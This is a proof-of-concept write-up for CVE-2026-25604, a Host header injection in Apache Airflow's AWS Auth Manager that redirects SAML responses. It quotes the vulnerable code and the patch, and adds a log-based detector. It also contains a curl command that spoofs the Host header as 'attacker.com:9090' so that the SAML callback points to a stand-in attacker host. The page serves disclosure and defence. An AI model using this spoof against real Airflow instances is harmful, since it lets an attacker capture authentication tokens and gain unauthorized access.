## https://sploitus.com/exploit?id=F4427F45-0EAA-5A2E-A203-5A502B9376F4
# CVE-2026-25604 PoC
**Host Header Injection leading to SAML authentication bypass in Apache Airflow's AWS Auth Manager**
An attacker can inject a malicious `Host` header into the SAML login flow, causing the Assertion Consumer Service (ACS) URL to point to an attacker-controlled server. This allows the attacker to **capture valid SAML responses** and **replay them to gain unauthorized access** to the victim Airflow instance, or to reuse tokens across different Airflow instances with different access controls.
## Affected Versions
| Package | Affected | Fixed |
|---------|----------|-------|
| `apache-airflow-providers-amazon` | 8.0.0 to 9.21.x | **9.22.0** |
### Official Description
> **CVE-2026-25604: Origin Validation Error in AWS Auth Manager (CWE-346)**
>
> In AWS Auth Manager, the origin of the SAML authentication has been used as provided by the client and not verified against the actual instance URL. This allowed to gain access to different instances with potentially different access controls by reusing SAML response from other instances.
>
> Source: [NVD](https://nvd.nist.gov/vuln/detail/CVE-2026-25604)
### References
| Source | Link |
|--------|------|
| NVD | https://nvd.nist.gov/vuln/detail/CVE-2026-25604 |
| Fix PR | https://github.com/apache/airflow/pull/61368 |
| Fix Commit | [`1a86aec`](https://github.com/apache/airflow/commit/1a86aec01d827ba8caf41b645db56663a9a61850) |
## Vulnerability Summary
Apache Airflow's AWS Auth Manager uses SAML 2.0 via AWS IAM Identity Center for authentication. When constructing the SAML authentication request, the `_prepare_flask_request()` method reads the `Host` header directly from the incoming HTTP request to build the ACS callback URL:
```python
# Vulnerable code in aws_auth_manager.py
def _prepare_flask_request(req):
    host = req.headers.get("Host", req.host)  # client-controlled value feeds the ACS URL
```
Attack flow (from the original diagram):

2. SAML AuthnRequest with ACS URL = `evil.com:8080/login_callback`
3. User authenticates at IdP login page
4. IdP redirects SAMLResponse to …
7. Authenticated!

- `…:/login_callback`
- **Application SAML audience:** `aws-auth-manager-saml-client`
- Copy the **SAML metadata URL** from the Identity Center console.
### 2. Start the mock vulnerable Airflow server
```bash
python mock_airflow.py <SAML_METADATA_URL> [PORT]
```
For example:
```bash
python mock_airflow.py https://portal.sso.us-east-1.amazonaws.com/saml/metadata/XXXX 8080
```
### 3. Send a login request with a spoofed Host header
In a separate terminal, initiate a SAML login with a manipulated `Host` header:
```bash
curl -v -H "Host: attacker.com:9090" http://127.0.0.1:8080/login
```
### 4. Observe the redirect
The server responds with a `302 Redirect` to the AWS IAM Identity Center login page. Inspect the SAML `AuthnRequest`: the `AssertionConsumerService` URL will point to `attacker.com:9090/login_callback` instead of the legitimate server.
### 5. Expected output
On the mock Airflow server console:
```
[LOGIN] Host header: attacker.com:9090
[DEBUG] http_host=attacker.com, server_port=9090
```
The SAML AuthnRequest now instructs the IdP to deliver the authenticated SAML response to `attacker.com:9090`, giving the attacker a valid token to replay.
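The console lines above are also the signal a defender can alert on: a SAML login whose `Host` header does not match the instance's configured base URL should never occur in a correctly fronted deployment. The following is an added example (not part of the PoC repository) that scans such `[LOGIN] Host header:` lines and flags mismatches; the log format, the sample lines and the base URL are constructed assumptions.

```python
# Added example, not part of the PoC repository: scan the mock server's
# "[LOGIN] Host header:" console lines and flag any login attempt whose Host
# header does not match the instance's configured base URL (the value an
# operator would set in AIRFLOW__API__BASE_URL). Log format and base URL are
# assumptions; the sample lines below are constructed.
import re
from urllib.parse import urlsplit

# Constructed sample of the mock server's console output.
SAMPLE_LOG = """\
[LOGIN] Host header: 127.0.0.1:8080
[DEBUG] http_host=127.0.0.1, server_port=8080
[LOGIN] Host header: attacker.com:9090
[DEBUG] http_host=attacker.com, server_port=9090
[LOGIN] Host header: 127.0.0.1
[LOGIN] Host header: attacker.com:bogus
"""

LOGIN_RE = re.compile(r"^\[LOGIN\] Host header: (?P<host>\S+)$")


def authority(netloc: str, scheme: str):
    """Normalize 'host[:port]' to 'host:port' (lower-cased, default port made
    explicit) so that '127.0.0.1' and '127.0.0.1:80' compare equal.
    Returns None for a malformed value such as a non-numeric port."""
    parts = urlsplit(f"//{netloc}")
    try:
        port = parts.port
    except ValueError:  # non-numeric or out-of-range port
        return None
    if not parts.hostname:
        return None
    if port is None:
        port = 443 if scheme == "https" else 80
    return f"{parts.hostname.lower()}:{port}"


def suspicious_logins(log_text: str, base_url: str) -> list:
    """Return the raw Host header values that do not resolve to the configured
    instance authority. A malformed Host value is reported as suspicious too."""
    base = urlsplit(base_url)
    scheme = base.scheme or "http"
    expected = authority(base.netloc, scheme)
    hits = []
    for line in log_text.splitlines():
        m = LOGIN_RE.match(line)
        if m and authority(m.group("host"), scheme) != expected:
            hits.append(m.group("host"))
    return hits


if __name__ == "__main__":
    for host in suspicious_logins(SAMPLE_LOG, "http://127.0.0.1:8080"):
        print(f"ALERT: SAML login initiated with unexpected Host header {host!r}")
```

Note that a bare `127.0.0.1` is flagged against a base URL on port 8080: the default port is made explicit before comparing, so a header that silently changes the port is caught as well as one that changes the hostname.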
## Vulnerable Code
`airflow/providers/amazon/aws/auth_manager/aws_auth_manager.py`, in the `_prepare_flask_request()` method:
```python
host = request.headers.get("Host", request.host)
```
This line trusts the client-provided `Host` header without validating it against the configured Airflow base URL (`AIRFLOW__API__BASE_URL`).
## Patch
The fix ([PR #61368](https://github.com/apache/airflow/pull/61368), merged Feb 3, 2026) replaces the request-derived host with the value from Airflow configuration:
```diff
- host = request.headers.get("Host", request.host)
+ host = conf.get("api", "base_url")
```
This ensures the ACS URL always matches the actual instance URL configured by the administrator, regardless of what `Host` header the client sends.
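To see why the one-line change closes the hole, here is an added example (not Airflow's code and not part of the PoC) that places the pre-fix and post-fix host selection side by side. `FakeRequest` stands in for the Flask request object and `CONF` for Airflow's `conf.get("api", "base_url")`; the settings dictionary is modelled on the request dict python3-saml expects, and the base URL is a constructed value.

```python
# Added example, not part of Airflow or the PoC repository: the pre-fix and
# post-fix ways of choosing the host for the SAML request settings, side by
# side. FakeRequest stands in for flask.Request and CONF for Airflow's
# conf.get("api", "base_url"); both are assumptions made for a stand-alone run.
# The settings dictionary is modelled on the request dict python3-saml expects;
# the exact shape used by Airflow is not asserted here.
from dataclasses import dataclass, field
from urllib.parse import urlsplit


@dataclass
class FakeRequest:
    """Minimal stand-in for the Flask request object (assumed fields only)."""
    headers: dict = field(default_factory=dict)
    host: str = "airflow.internal:8080"  # what Flask derives when no Host header is sent
    scheme: str = "http"
    path: str = "/login"


# Stand-in for airflow.configuration.conf; the base URL is a constructed value.
CONF = {("api", "base_url"): "http://airflow.internal:8080"}


def _saml_settings(scheme: str, host: str, path: str) -> dict:
    """Split 'host[:port]' into the fields the SAML library builds the ACS URL from."""
    parts = urlsplit(f"//{host}")
    port = parts.port or (443 if scheme == "https" else 80)
    return {
        "https": "on" if scheme == "https" else "off",
        "http_host": parts.hostname,
        "server_port": str(port),
        "script_name": path,
    }


def prepare_vulnerable(req: FakeRequest) -> dict:
    """Pre-fix logic: the client-supplied Host header decides the host."""
    host = req.headers.get("Host", req.host)
    return _saml_settings(req.scheme, host, req.path)


def prepare_fixed(req: FakeRequest) -> dict:
    """Post-fix logic: the host comes from the administrator-configured base URL,
    so nothing the client sends can move the ACS endpoint."""
    base = urlsplit(CONF[("api", "base_url")])
    return _saml_settings(base.scheme, base.netloc, req.path)


def acs_url(settings: dict) -> str:
    """The AssertionConsumerService URL the IdP would be told to post back to."""
    scheme = "https" if settings["https"] == "on" else "http"
    return f"{scheme}://{settings['http_host']}:{settings['server_port']}/login_callback"


if __name__ == "__main__":
    spoofed = FakeRequest(headers={"Host": "attacker.com:9090"})
    print("vulnerable:", acs_url(prepare_vulnerable(spoofed)))  # follows the header
    print("fixed:     ", acs_url(prepare_fixed(spoofed)))       # follows configuration
```

The same spoofed request yields an ACS URL under the header's host in the vulnerable path and the configured instance URL in the fixed path; a request with no `Host` header at all behaves identically in both, which is why the bug is invisible in ordinary traffic and only a review of where the host value originates reveals it.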
## Impact
- **Confidentiality:** An attacker gains authenticated access to Airflow, which may contain sensitive DAG configurations, connections with credentials, and data pipeline metadata.
- **Integrity:** Unauthorized users can trigger, modify, or delete DAGs, potentially disrupting critical data workflows.
- **Cross-instance escalation:** In multi-tenant environments, SAML tokens can be reused across instances with different RBAC configurations.
## Credits
- **Discovered by:** Sungwuk Jung
- **Fixed by:** Vincent Beck ([@vincbeck](https://github.com/vincbeck)), Apache Airflow Security Team
## Disclaimer
This proof-of-concept is provided for **educational and authorized security testing purposes only**. Use it responsibly and only against systems you own or have explicit permission to test.